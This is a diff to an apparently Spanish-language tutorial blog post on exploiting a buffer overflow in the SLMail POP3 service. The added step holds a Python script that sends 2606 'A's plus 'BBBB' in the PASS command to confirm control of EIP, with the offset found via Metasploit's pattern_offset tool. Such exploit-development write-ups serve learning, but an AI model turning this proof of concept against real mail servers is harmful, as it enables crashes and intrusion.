--- a/_posts/BOF/2021.12.19.SLMail_Bof.md
+++ b/_posts/BOF/2021.12.19.SLMail_Bof.md
@@ -26,3 +26,40 @@ if __name__ == '__main__':
     s.send("PASS %s\n\r" % buffer)
     data = s.recv(1024)
 ```
+Proseguimos y sacamos el offset y metemos un nuevo payload para corroborar que tenemos el contros del EIP
+
+``` 
+ #!/usr/bin/python
+
+ import socket, sys, signal, pdb
+
+ def def_handler(sig, frame):
+            print "\n[*] Saliendo ...\n"
+            sys.exit(1)
+
+ # CTRL + C
+ signal.signal(signal.SIGINT, def_handler)
+
+ # Variables globales
+ ip_address = sys.argv[1]
+ rport = 110
+
+ if __name__ == '__main__':
+
+     offset = 2606  # [*] /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 39694438
+     after_EIP = "BBBB"
+     payload = "A" * offset + after_EIP
+
+     pdb.set_trace()
+     s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+     s.connect((ip_address, rport))
+     data = s.recv(1024)
+
+     s.send("USER prueba\n\r")
+     data = s.recv(1024)
+
+     s.send("PASS %s\n\r" % payload)
+     data = s.recv(1024)
+
+ print "[*] Payload Controlando EIP + BBBB - Enviado con Exito [*]"
+```
